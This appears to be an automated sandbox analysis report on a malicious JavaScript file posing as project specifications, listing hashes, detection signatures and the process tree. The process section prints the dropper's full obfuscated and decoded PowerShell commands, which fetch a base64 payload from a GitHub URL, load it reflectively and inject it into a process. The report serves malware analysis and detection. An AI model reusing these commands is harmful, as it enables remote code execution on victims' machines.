Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 00:51

General

  • Target

    PROJECT DETAILS AND SPECIFICATIONS.js

  • Size

    197KB

  • MD5

    ef818b0f3b065744f9ca0e7e6463fa5a

  • SHA1

    042ab0111d9be103d7558da8d5aacb86f7c91d22

  • SHA256

    f599b75aff511ee47cf3e7ea69ff58ef8025f15340add9b7c01bc7baaaaf9503

  • SHA512

    6d48fcd76d1db0fdb208c324139cdcca6e154508cfb783cd09dd51766f20177877ddeb1782180ac14631b5a7a373b1aa85ff512665369118178edb7a19c6f735

  • SSDEEP

    6144:gzMNJy9Ha4Lp17+n4O9/8bTwNN4mEqtm4I3W4J:JNo93Lp17U4O9/8bTw/43qtm4eW4J

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\PROJECT DETAILS AND SPECIFICATIONS.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAWAAnACsAJwBuAHQAdQByAGwAIAA9ACcAKwAnACAAJwArACcAMwAnACsAJwA5AG0AJwArACcAaAB0AHQAcABzADoALwAvAHIAJwArACcAYQB3ACcAKwAnAC4AJwArACcAZwBpAHQAaAB1AGIAJwArACcAdQBzACcAKwAnAGUAcgAnACsAJwBjAG8AbgB0ACcAKwAnAGUAbgB0AC4AYwBvAG0AJwArACcALwAnACsAJwBOACcAKwAnAG8ARABlAHQAZQBjACcAKwAnAHQAJwArACcATwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAJwArACcAYwB0AE8AbgAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtACcAKwAnAGEAaQBuAC8AJwArACcARABlAHQAJwArACcAYQBoAE4AJwArACcAbwB0ACcAKwAnAGUAXwBKAC4AdAB4ACcAKwAnAHQAJwArACcAMwA5AG0AOwAgACcAKwAnAFgAbgB0AGIAJwArACcAYQBzAGUANgA0AEMAbwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAAnACsAJwBlAG0ALgBOAGUAJwArACcAdAAuACcAKwAnAFcAZQAnACsAJwBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgAnACsAJwBEAG8AdwAnACsAJwBuACcAKwAnAGwAbwBhAGQAUwAnACsAJwB0AHIAaQAnACsAJwBuAGcAJwArACcAKABYACcAKwAnAG4AdAB1AHIAJwArACcAbAApADsAIABYAG4AdAAnACsAJwBiAGkAbgBhAHIAeQAnACsAJwBDAG8AbgB0AGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgAnACsAJwB2AGUAcgB0AF0AOgA6AEYAcgBvACcAKwAnAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAJwArACcAKABYAG4AdAAnACsAJwBiAGEAJwArACcAcwAnACsAJwBlADYANAAnACsAJwBDAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACkAOwAgAFgAJwArACcAbgAnACsAJwB0ACcAKwAnAGEAcwAnACsAJwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbACcAKwAnAFIAZQBmACcAKwAnAGwAZQAnACsAJwBjAHQAJwArACcAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAJwBBAHMAcwBlAG0AYgBsAHkAXQA6ACcAKwAnADoATABvAGEAJwArACcAZAAnACsAJwAoACcAKwAnAFgAbgAnACsAJwB0AGIAJwArACcAaQAnACsAJwBuAGEAJwArACcAcgB5ACcAKwAnAEMAbwBuAHQAZQBuAHQAKQA7ACAAWwAnACsAJwBkACcAKwAnAG4AbABpAGIAJwArACcALgBJAE8ALgAnACsAJwBIAG8AbQBlAF0AOgA6AFYAJwArACcAQQBJACcAKwAnACgAYQAnACsAJwBuADEAdAB4AHQAJwArACcALgAnACsAJwBzAGEAYgBiAGEALwB2ACcAKwAnAGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ACcAKwAnADUAYgAxAGIAYwAwAGQANAA1AGIANgAzADIAJwArACcAZQAnACsAJwBiADkAJwArACcAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAJwArACcAcAB0AHQAJwArACcAaABhAG4AJwArACcAMQAsACAAJwArACcAYQAnACsAJwBuADEAZABlAHMAYQB0AGkAdgAnACsAJwBhAGQAbwAnACsAJwBhAG4AMQAsACcAKwAnACAAYQBuADEAZAAnACsAJwBlACcAKwAnAHMAYQAnACsAJwB0AGkAdgBhAGQAbwAnACsAJwBhAG4AJwArACcAMQAsACAAYQBuACcAKwAnADEAZABlAHMAYQB0AGkAdgBhAGQAbwBhAG4AMQAsACAAYQBuADEAQQBkAGQASQAnACsAJwBuAFAAcgBvAGMAZQBzACcAKwAnAHMAMwAyAGEAbgAxACwAIAAnACsAJwBhACcAKwAnAG4AMQBkAGUAcwBhACcAKwAnAHQAaQAnACsAJwB2ACcAKwAnAGEAZAAnACsAJwBvAGEAbgAnACsAJwAxACwAYQBuADEAYQBuADEAKQAnACkAIAAgAC0AYwByAGUAcABsAGEAQwBFACcAYQBuADEAJwAsAFsAYwBoAGEAUgBdADMANAAgAC0AUgBFAHAATABBAEMAZQAoAFsAYwBoAGEAUgBdADUAMQArAFsAYwBoAGEAUgBdADUANwArAFsAYwBoAGEAUgBdADEAMAA5ACkALABbAGMAaABhAFIAXQAzADkALQBjAHIAZQBwAGwAYQBDAEUAIAAgACcAWABuAHQAJwAsAFsAYwBoAGEAUgBdADMANgApAHwASQBuAFYAbwBLAEUALQBlAHgAcABSAEUAcwBTAEkAbwBOAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('X'+'nturl ='+' '+'3'+'9m'+'https://r'+'aw'+'.'+'github'+'us'+'er'+'cont'+'ent.com'+'/'+'N'+'oDetec'+'t'+'On/NoDe'+'te'+'ctOn/refs/heads/m'+'ain/'+'Det'+'ahN'+'ot'+'e_J.tx'+'t'+'39m; '+'Xntb'+'ase64Content = (New'+'-Object Syst'+'em.Ne'+'t.'+'We'+'bC'+'li'+'ent).'+'Dow'+'n'+'loadS'+'tri'+'ng'+'(X'+'ntur'+'l); Xnt'+'binary'+'Content ='+' [System'+'.Con'+'vert]::Fro'+'mBas'+'e64String'+'(Xnt'+'ba'+'s'+'e64'+'Co'+'n'+'tent); X'+'n'+'t'+'as'+'sembly '+'= ['+'Ref'+'le'+'ct'+'i'+'o'+'n'+'.'+'Assembly]:'+':Loa'+'d'+'('+'Xn'+'tb'+'i'+'na'+'ry'+'Content); ['+'d'+'nlib'+'.IO.'+'Home]::V'+'AI'+'(a'+'n1txt'+'.'+'sabba/v'+'ed.2r.39b345302a07'+'5b1bc0d45b632'+'e'+'b9'+'ee62-bup//:s'+'ptt'+'han'+'1, '+'a'+'n1desativ'+'ado'+'an1,'+' an1d'+'e'+'sa'+'tivado'+'an'+'1, an'+'1desativadoan1, an1AddI'+'nProces'+'s32an1, '+'a'+'n1desa'+'ti'+'v'+'ad'+'oan'+'1,an1an1)') -creplaCE'an1',[chaR]34 -REpLACe([chaR]51+[chaR]57+[chaR]109),[chaR]39-creplaCE 'Xnt',[chaR]36)|InVoKE-expREsSIoN"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2140

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    a0aac99c9afffff60d2fd89eae076435

    SHA1

    252b0495b521d8f90ee07229246d85abca5f328e

    SHA256

    577891673b19f5f6ebfc6022dc41e9afce55a247794ec19a8b9056e22531e6ca

    SHA512

    9e11a2e9269aff8e4c3a1df23c534862041200c75fa830173948bd49758db2f79afde9ee9db1463e1228cd9a8444aa278d5381ebfd147eec3a63998e3694b18d

  • memory/1828-4-0x000007FEF542E000-0x000007FEF542F000-memory.dmp

    Filesize

    4KB

  • memory/1828-5-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1828-7-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1828-6-0x0000000002360000-0x0000000002368000-memory.dmp

    Filesize

    32KB

  • memory/1828-8-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1828-9-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1828-10-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1828-16-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1828-17-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

    Filesize

    9.6MB